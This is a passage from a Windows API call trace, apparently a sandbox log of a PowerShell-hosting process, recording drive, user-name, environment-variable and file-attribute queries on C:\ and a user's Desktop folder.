(cb=0x68) returned 0x1b83b410 [0068.911] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b83b3a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d210, lpMaximumComponentLength=0x12d20c, lpFileSystemFlags=0x12d208, lpFileSystemNameBuffer=0x1b83b410, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d210*=0x9c354b42, lpMaximumComponentLength=0x12d20c*=0xff, lpFileSystemFlags=0x12d208*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.911] CoTaskMemFree (pv=0x1b83b3a0) [0068.911] CoTaskMemFree (pv=0x1b83b410) [0068.911] SetErrorMode (uMode=0x1) returned 0x1 [0068.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.912] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.912] SetErrorMode (uMode=0x1) returned 0x1 [0068.912] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d1b0 | out: lpFileInformation=0x12d1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0068.913] SetErrorMode (uMode=0x1) returned 0x1 [0068.913] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.913] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.913] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.914] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.914] SetErrorMode (uMode=0x1) returned 0x1 [0068.914] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfe0 | out: lpFileInformation=0x12cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0068.915] SetErrorMode (uMode=0x1) returned 0x1 [0068.915] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.915] SetErrorMode (uMode=0x1) returned 0x1 [0068.915] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfe0 | out: lpFileInformation=0x12cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0068.915] SetErrorMode (uMode=0x1) returned 0x1 [0068.915] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.915] SetErrorMode (uMode=0x1) returned 0x1 [0068.915] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d080 | out: lpFileInformation=0x12d080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0068.915] SetErrorMode (uMode=0x1) returned 0x1 [0068.916] CoTaskMemAlloc (cb=0x804) returned 0x1b850d30 [0068.916] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b850d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.917] CoTaskMemFree (pv=0x1b850d30) [0068.917] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.917] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.917] CoTaskMemFree (pv=0x282650) [0068.918] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d2f3f0*="FileSystem", lpRawData=0x3d2f180) returned 1 [0068.919] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.920] CoTaskMemFree (pv=0x22fde0) [0068.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.922] CoTaskMemAlloc (cb=0x804) returned 0x1b850d30 [0068.922] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b850d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.922] CoTaskMemFree (pv=0x1b850d30) [0068.922] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.922] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.922] CoTaskMemFree (pv=0x282650) [0068.923] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d34c30*="Function", lpRawData=0x3d349c0) returned 1 [0068.926] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.927] CoTaskMemFree (pv=0x22fde0) [0068.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.994] CoTaskMemAlloc (cb=0x804) returned 0x1b851d30 [0068.994] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b851d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.994] CoTaskMemFree (pv=0x1b851d30) [0068.994] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.994] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.994] CoTaskMemFree (pv=0x282650) [0068.994] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d57458*="Registry", lpRawData=0x3d571e8) returned 1 [0068.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.996] CoTaskMemAlloc (cb=0x804) returned 0x1b851d30 [0068.997] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b851d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.997] CoTaskMemFree (pv=0x1b851d30) [0068.997] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.997] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.997] CoTaskMemFree (pv=0x282650) [0068.998] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d5c870*="Variable", lpRawData=0x3d5c600) returned 1 [0068.998] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.998] CoTaskMemFree (pv=0x22fde0) [0069.000] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.000] CoTaskMemFree (pv=0x22fde0) [0069.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0069.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0069.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0069.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0069.031] CoTaskMemAlloc (cb=0x804) returned 0x1b851d30 [0069.031] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b851d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0069.032] CoTaskMemFree (pv=0x1b851d30) [0069.032] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0069.032] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0069.032] CoTaskMemFree (pv=0x282650) [0069.033] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d70488*="Certificate", lpRawData=0x3d70218) returned 1 [0069.039] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.039] CoTaskMemFree (pv=0x22fde0) [0069.042] GetLogicalDrives () returned 0x4 [0069.042] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0069.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.044] CoTaskMemAlloc (cb=0x20e) returned 0x2bc5a0 [0069.044] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc5a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.044] CoTaskMemFree (pv=0x2bc5a0) [0069.045] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.046] CoTaskMemFree (pv=0x22fde0) [0069.046] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.046] CoTaskMemFree (pv=0x22fde0) [0069.063] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.063] CoTaskMemFree (pv=0x22fde0) [0069.064] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.064] CoTaskMemFree (pv=0x22fde0) [0069.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.064] SetErrorMode (uMode=0x1) returned 0x1 [0069.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.065] SetErrorMode (uMode=0x1) returned 0x1 [0069.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.065] SetErrorMode (uMode=0x1) returned 0x1 [0069.065] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.065] SetErrorMode (uMode=0x1) returned 0x1 [0069.065] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.065] CoTaskMemFree (pv=0x22fde0) [0069.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0069.071] SetErrorMode (uMode=0x1) returned 0x1 [0069.071] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.071] SetErrorMode (uMode=0x1) returned 0x1 [0069.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0069.071] SetErrorMode (uMode=0x1) returned 0x1 [0069.071] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.071] SetErrorMode (uMode=0x1) returned 0x1 [0069.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0069.071] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0069.071] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.072] SetErrorMode (uMode=0x1) returned 0x1 [0069.072] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0069.072] SetErrorMode (uMode=0x1) returned 0x1 [0069.072] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.072] SetErrorMode (uMode=0x1) returned 0x1 [0069.072] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0069.072] SetErrorMode (uMode=0x1) returned 0x1 [0069.072] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.072] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.073] SetErrorMode (uMode=0x1) returned 0x1 [0069.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.073] SetErrorMode (uMode=0x1) returned 0x1 [0069.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.073] SetErrorMode (uMode=0x1) returned 0x1 [0069.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.073] SetErrorMode (uMode=0x1) returned 0x1 [0069.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", 